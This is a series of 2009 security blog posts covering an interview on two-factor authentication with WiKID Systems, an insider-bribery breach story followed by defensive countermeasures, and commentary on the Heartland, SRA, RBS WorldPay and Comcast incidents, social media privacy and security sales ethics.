Immediately, I wanted to know why Nick thought that 2FA (2-Factor Authentication) hasn't been more widely implemented. I've always thought that strong (2FA) authentication should be the baseline for any well-protected online system... Nick's thoughts were pretty much in-line with what I was thinking... Nick highlighted the two main points that have plagued 2FA (and strong authentication in general) for the last several years - namely cost and complexity. While hardware tokens are still expensive and not practical overall, token-based authentication still falls victim to MITM (Man-in-the-Middle) attacks and complexity makes it hard for every online shop to adopt this strategy.
As the conversation turned towards making 2FA more mainstream we seemed to agree that (as his PC token demonstrates) mutual HTTPS authentication is good for network security and applications such as mutual-verification and VPN solutions, but this approach doesn't solve every need universally - which is a problem in itself.
There are other issues with 2FA and "tokens" in general... for example as Nick explains, there are other concerns:
Nick: "Malware is a concern - but if you look at what is actually happening, it is a combo. Take the checkfree breach: the attackers (we think) stole the username and password for Checkfree's Network Solutions account and created a MITM attack redirecting users to site that installed malware. If Network Solutions used 2FA, it wouldn't have happened. If Checkfree used mutual https authentication it also wouldn't have happened! So, it gets down to doing something - which is better than nothing - and defense in depth."
So where does the line of responsibility for the security/privacy of a transaction lie? How much do we trust the end-user's browser when we're dealing with web applications? This is one of those tough questions I like to hear people's answers to... and Nick's insight was interesting.
Nick: "Well, not at all - OK, that's not really true. Perhaps trust is the wrong word because it has morally right or wrong, black/white connotations. Really, it's more about risk acceptance: "I'll take a risk that there is no man-in-the-browser for now, but once that risk increases past X, I need to do out-of-band transaction authentication. In terms of "responsibility", I think a lot of that is regulated for many financial institutions and to a less extent driven by the market."
That's so true - risk is at the base for every decision especially about stronger authentication. But at what point does the risk equation turn the strong authentication issue from a "nice to have" into a "must have"? There aren't any easy answers...
Nick: "Notoriously tough question! I think certain sectors will have that soon. Why doesn't Network Solutions use two-factor authentication already? I would think that Checkfree would gladly pay for it. I think the gamers will see it soon too, such as online poker, etc."
Taking it as a given that people won't want to carry around a token for each merchant they want to have strong authentication to, there has to be a better solution, right? What about a single-broker solution that could be federated out to many different customers such that one token in your hand could get you access to many of the systems you use today including your bank, favorite merchant( and yes... even online poker)?

Nick: "Well, WiKID is well designed for that. We have a customer - Online Banking Solutions - that runs WiKID in a "cloud" (what used to be "service bureau" then "ASP" :). Each bank is a network client to their WiKID server and can add/manager users, get reports, etc. without impacted the other network clients."
That's brilliant. So this one-token approach should be used everywhere, right? It's cost-effective, scalable, and open-source... so why isn't everyone on this bus? Maybe not enough companies have heard of WiKID?

As a final thought, I asked Nick his thoughts on "user-friendly security" and how his products and services conform to the stupid-user usability curve... meaning, are they user-friendly enough to be used by Joe Average user...
Nick: "I think so. For example, our PC token automatically copies the OTP to the clipboard and if mutual HTTPS is set up, then the default browser is launched by the token to the validated site. We also can handle multiple domains - so one token can work with many sites and each user can have more than one token - so one on their BB and one on the laptop, etc. In general, people like using a cellphone more than carrying hardware."
I'd like to thank Nick Owen of WiKID Systems for taking the time to chat, and field my questions on the topic of 2FA or strong authentication. This is a very necessary piece of technology that must not only be simple to use, but adoptable practically... I think WiKID does this smashingly well.

Saturday, February 7, 2009

Your GPS is evil

Everyone has a GPS in their vehicle these days.  I bet you've even programmed your house into the home button, right?  I'd like to tell you that's a really bad idea.  Why, you wonder?  Consider this.
As your car is parked in the garage at the office, someone breaks your window and swipes your GPS.  They also swipe your garage door opener.  They then drive to your house (thanks to the help of your GPS) and open your garage while you're at work.  They can then help themselves to what ever you own, and leave without arousing suspicion.
So what should you do,  you're probably asking yourself.  I suggest going to the nearest gas station from your home, a fast-food restaurant, or some place far enough from your home but so that you know where you are and set that as your home.  This measure, although simple, will keep some thief from possibly being led straight to your home.

Stay safe!

Friday, February 6, 2009

People Hacking 101: How to Infiltrate a Credit Agency

The economic situation is getting worse.  Layoffs are pervasive in every industry, and it's global.

It gets worse.  Since there is very little chance for pay raises or employee "happiness" spending, things are starting to look grim, and this is driving higher insider crime - but maybe not in the sense that immediately comes to mind.

A peek into the distressed employee's mind can show a battle royale of opposing forces; one side is upset and wants to set fire to the place, the other is happy to have a job.  Enter into this situation the dire economic need more and more employees find themselves in and you begin to see an ethical situation teetering on the brink.

All that's needed now is a slight nudge in one direction or the other.  The following scenario is real... played itself out in real-life about 3 years ago... when things were still half-way decent.
After a 3rd round of layoffs from the Acme Credit Card Company employee morale was down, and everyone was worried about losing the job next.  The call center employees knew that at any given point they could be next, and with the local economy faring poorly, everyone was in a state of panic.
One evening on the way to her car a female call center employee was approached with an offer.  For $1,000 and dinner she would need to answer some questions about the Acme Credit Card Company's internal call center procedures.  The inquisitor was clearly after some security knowledge that only an insider could give... but the employee seized the opportunity for a quick grand, obliged.  The following week the same employee was approached in the parking lot again with a USB memory stick, and an envelope.  The envelope contained simple instructions, and $3,000 cash with the promise of a higher payout on completion of the task.
Over the next 2 weeks the employee followed directions and plugged in the USB stick and ran a simple application while she worked during the day, then unplugged it and slipped it into her shirt on the way out the door so no one would suspect anything.  After 2 weeks, she was approached again, in the parking lot, with another envelope and an outstretched hand for the memory stick.  The envelope had another $6,000 in it, bringing the total to $10,000 for 2 weeks of simple covert operation.
The employee never heard from or saw that person again...
Now - ask yourself what protections your company has against this situation.  What types of protections will the antivirus, the IDS, the DLP appliances, and all the other "boxes" on your network afford you?

This turned out to be a data breach that saw nearly ~100,000 cardholder records compromised, including online logins, passwords, credit card numbers, mother's maiden name... you name it.  The total cost was estimated somewhere around $14MM including cleanup, fraud, and other associated costs.

This will become more prevalent as the economic climate deteriorates, and organized crime begins to step in even harder.

There are measures which can protect against this type of situation, and rarely do the countermeasures require serious purchases...
  • First and foremost identify where critical information (such as cardholder data, etc) lives in your network and systems
  • Lock down critical information on a need-to-know basis, masking non-necessary bits
  • Establish role-based access controls and procedures (monitor they are enforced)
  • Create an oversight/audit group which can operate independently of IT, reporting to either Legal Counsel, or Risk... audit internal procedures and their effectiveness regularly
  • Establish behavioral-baselines for your employees; profile what groups of people do what and then create red flags when there are deviations
  • Lock down workstations, remove the user's ability to add hardware/software to your pre-built, locked-down image
  • Create a zero-in/zero-out policy; establish checkpoints at the entrance to call centers and critical data silos... create a policy that allows for nothing to be brought in, or removed without specific authorization
  • Perform extensive background checks tiered appropriately to the level of access an employee has
  • Make these policies public and post consequences...
With a little bit of hard work, your company can survive the onslaught of organized crime, and rogue employees.  What measures do you have that would protect you in this very real situation?  I'd love to hear your answers either publicly or privately.

Thursday, February 5, 2009

When Going Gets Tough - Bad Guys Get Creative

"Necessity is the mother of invention" is one of my favorite quotes.

When things get tough, as in our current economic situation, people find creative ways to get by. Often times time means turning to crime, and becoming creative. This was clearly the case when a fake parking ticket scam was used to direct people to a website that installed a fake IE BHO (Browser Helper Object), which then tried to get you to install fake anti-virus software, as has been the case in many instances before.

The goal, as always, is to make money on you. P.T. Barnum said it, "There's a sucker born every minute"... and these people capitalize on that. Don't be a sucker.

FaceBook Vulnerable to SQL Injection?

[ Source: http://hackersblog.org/2009/02/04/facebook-hacked-o-baza-de-date-cu-milioane-de-conturi-ce-pot-fi-accesate-de-oricine/ ]

This just in, FaceBook is vulnerable to SQL Injection... well, not exactly. FaceBook apps are vulnerable to SQL Injection based on the posting on the HackersBlog website. Interestingly enough the screen shots provided are not really of the base FaceBook application, but rather the add-ons that people can code into this application.

So the question is... did someone ("unu") find a bunch of holes in poorly-written FaceBook applications, and if so... does that expose the rest of the FaceBook application to SQL Injection?

Stay tuned.

Wednesday, February 4, 2009

SRA Data Breach Analysis

If you've read your breach notification lately, SRA International announced it suffered a data breach.

{ Links }
Read carefully, there is a consistent theme in every one of those links... "SRA recently discovered a virus... that was not detected by its antivirus"... let's focus on that for a minute. While Mr. Ralph DeFrangesco of ITBusinessEdge seems to surmise that SRA Intl's antivirus systems were simply out-of-date, I will offer an alternative albeit more sinister explanation. My explanation requires a dig back into the news releases from Heartland Payment Systems (HPS) and the hoopla surrounding that incident. Both of these, if read carefully, point to a piece of malware that infiltrated otherwise healthy, reasonably-well maintained networks. Now, while I've been known to poke the occasional fun at "compliant" companies which suddenly become compromised I'd like to take a step back and address this from a slightly more sinister angle as I said before.

What-if... just what-if these "malware/viruses" which were placed inside these companies weren't run-of-the-mill worms/malware/viruses? What if, and this sounds more logical, these were custom-created malware with the intended purpose of infiltrating these companies and executing data breaches? Doesn't that sound more logical, given all we know, Mr. DeFrangesco? Doesn't that more easily explain how these malware could have slipped past antivirus systems? When's the last time your anti-virus caught an "0day" exploit? I'm going to guess never... and I'll stake my hard-earned reputation on that.

What we have here, folks, is a case of bad economic times breeding ugly things. These companies could have been compliant with everything known to man, had up-to-date anti-virus software on all desktops, servers and network wires and they still would have succumbed to these pieces of malware. Why? Antivirus is fundamentally flawed, period. Being able to stop an attacker only after they've been identified is nearly useless.

What I suspect is going on here, and will be happening more and more in the coming year - is that someone was commissioned to write a piece of malware which would attack a vector specific to HPS, or SRA... exploit the system and collect the data the attacker wanted. This malware would be largely undetected (as there are no signatures for custom malware), and would only be caught under extraordinary circumstances, or with dumb luck.

So you see... HPS, SRA, and the soon-to-be countless others are going to fall victim like dominoes, one right after the other and there is [almost] nothing any of them can do about it. The only effective measures against hard times and organized crime (which is what I surmise these cases clearly wreek of) is good, effectively implemented least-privilige policy, well-educated staff, and risk-based mitigation.

You heard it here first... this is just the beginning.

Commentary on social media vs privacy

It seems that you can't get away from social media lately. Twitter, FaceBook, LinkedIn, Dopplr... and those are just the ones you'll find me on.

While MySpace (which is currently the reigning king of social media geared towards children, and those who would prey upon them) recently kicked off 90,000 sexual offenders I'm left pondering the pervasiveness of social media on our lives and the impact that has on our culture.

The first thing that springs to mind is privacy, or lack thereof. As we post our whereabouts on twitter, FaceBook, and other locations we start to whittle away our own privacy yet we complain about the measures our government takes to keep track of us on the expressways (as an example). It seems that it's OK when we give up our privacy ourselves, but when someone else takes it away that's not OK... I guess I can see that.

To take this a step further, have you ever Google'd yourself? How much information can someone find out about you online via a simple search? Would a thief know when to show up at your home and rob you blind? Could someone guess a password of yours simply by keeping track of your interests online? Think about it.

The next time you go and post your status to Twitter, FaceBook, or MySpace... make sure you know what you're getting into. There is a price to pay for social connectivity - and that price is privacy.

Tuesday, February 3, 2009

RBS WorldPay Fallout - FBI Uncovers Coordianted ATM Fraud

02/05/2009 | Update

  Don't you just love mug shots?  Since this has been all over the news, it may be interesting to hear and read that there is now a full-scale manhunt on for these folks (who are guaranteed to be low-level "cashers"), in order to flip them on their bosses.  Hopefully this is tracked by the FBI to its end.

---

[ Source: http://www.foxnews.com/story/0,2933,487184,00.html ]

If you're still skeptical about the impact that the poor economy is having on fraud and hacking, read this new story off the Fox News wire. The FBI has uncovered a $9M world-wide coordinated ATM withdrawl...
"In a matter of hours, thieves struck ATMs from 49 different cities — including New York, Atlanta, Chicago, Moscow and Montreal — just after 8 p.m. EST on Nov. 8, according to the FBI."
While this is certainly not the first time stolen records (this time from RBS WorldPay) were used in ATM fraud which resulted in real dollar-losses, this is one of the biggest. What's even of higher note is that this happened in an extremely well-coordinated fashion, from the quote above. Hacking isn't just about bored high-school kids anymore - it's about organized crime syndicates, making real multi-million dollar hacks-and-fraud schemes a reality nightmare for banks. All the compliance in the world won't protect you if you've done nothing to fix security issues at these banks, card issuers, and card processors (like Heartland Payment Systems).

For a while now we've been discussing how big the potential fraud will be from the HPS ~100MM record heist... and if we extrapolate out from the RBS Worldpay attack... (which was 1.5MM records) the incidence of fraud for the Heartland Payment Systems hack will be catastrophic.

This should be yet another wake-up call for banks, processors, and card institutions... FIX YOUR SECURITY else face the wrath of fraudsters (and extremely upset end-users).

Monday, February 2, 2009

Comcast Hacked - 30-seconds of porn during SuperBowl!

[Source: http://www.tmcnet.com/usubmit/-tucson-comcast-we-wuz-hacked-cable-provider-apologizes-/2009/02/02/3958118.htm]

Someone [31337 h@x0rz?] apparently hacked the video feed (non-HD feed) of Comcast out in Tucson, AZ; and with 3 minutes left in the 4th quarter (after Fitzgerald had just run in for a TD) spliced in 30-seconds or so of a porn channel. Absolutely classic! This reminds me of the opening scene in Hackers... remember that movie?
"Our initial investigation suggests this was an isolated malicious act," Comcast spokeswoman Kelle Maslyn told the Star in an e-mail."
These types of hacks are old-school... but how much of it is made-up "hacker" stuff from Comcast to cover their own assets, and how much of it is real? Who knows.

Sunday, February 1, 2009

Unix Time Reaches Milestone on 2/13/2009

So Josh Abraham (jabra, of spl0it.org) IM'd me this morning to remind me (since I obviously wasn't paying any attention) that:

At precisely 11:31:30pm UTC on February 13th, 2009 UNIX time will be 1, 234, 567, 890

How cool is that?! Thanks Josh.

Heartland Payment Systems - Data Breach Fallout

The fallout has officially begun... one of the largest MasterCard franchises in Canada, Canadian Tire, has re-issued 16,000 cards to it customers as a result of the breach. While this was, apparently, largely precautionary - the reality is now staring us in the face. This is costing companies serious dollars to re-issue cards, call customer or send some other notification, and monitor accounts...

I suspect that HPS will be eating the costs of their mis-adventure for years to come, assuming that they somehow manage to miraculously pull through this still in business.

Source: http://www.thestar.com/Business/article/579317

Sales vs. Reality

To my anonymous commenter to the post I pulled earlier... thanks for the reality-check... it's been a rough week and perhaps I was a bit too...edgy.

Over the past 12 months, since joining the organization I currently work for, I've heard complaint after complaint about sales people. I know, I sympathize, I've typically trusted them half as far as I could throw them - and still do - so I wanted to write up a quick(er) version of why I think sales people, particularly in the security field, really need to check their ethics.

A few years ago when I was working for GE Power Systems, I had the misfortune of sitting through a meeting with a particularly bad sales guy. He had managed to convince our CISO that his company could really solve some of our problems so it was up to my two colleagues and I to listen to his presentation and decide. From the start, things just didn't get off right.

When the guy walked into the conference room he informed us that he had the answer to everything that ailed us in security. I figured this was rather ambitious since he had no idea what our problems were but her persisted. He asked us to give him our top-3 security challenges, which we did, then he proceeded to "solve" them for us using his product(s). Now, everyone's heard the phrase "When all you have is a hammer, everything looks like a nail" but this was taking it to a new extreme.

His in-line network appliance-based approach, together with a multi-server infrastructure and a client installed on every workstation and server would solve all our problems. Let's assume for a moment that this proposal was even remotely feasible on a network as large as we were trying to secure - the costs would be outrageous, and given the complexity (and lack of hard-line management) this network suffered from it was physically impossible to implement that solution. These blunt facts, of course, didn't really stop this guy. The fact is, he kept talking until we finally had to explain to him, in detail, why his product made zero sense in our environment.

Presentation and comprehension fail.

Here's my point... there are several tactics which sales folks often use that do a dis-service to the products or solutions themselves... and clearly seek to "accidentally" ruin our credibility in a fragile market - but rather than call those out (as was pointed out to me earlier) perhaps it would be more constructive to throw out some pointers to any sales folks who read this blog...
  • Research the prospec - get to understand as much as you can about their situation, challenges, and current situation
  • Sell reality - Don't over-inflate, stretch, or bend the truth about the capabilities of what-ever you're talking about
  • Your product is not the silver bullet - it doesn't matter what you're selling, it won't make your customer magically secure - learn it, accept it
  • There is no state of security - only states of higher-order risk mitigation
  • All the above applies even more when you're selling directly to a C-level
  • Products are useless without process - from firewalls, to antivirus, to scanner software... none of it is worth crap if there isn't a process around using it
  • People and tools are not mutually exclusive - you're going to need both to succeed, until tools learn to think
  • Product | Services aren't mutually exclusive either - see above
There you have it... and as a final thought - on the flip-side of that if you've got someone who's honestly trying to solve one of your problems... give them a chance, not all of the sales folks out there are bad.
Google+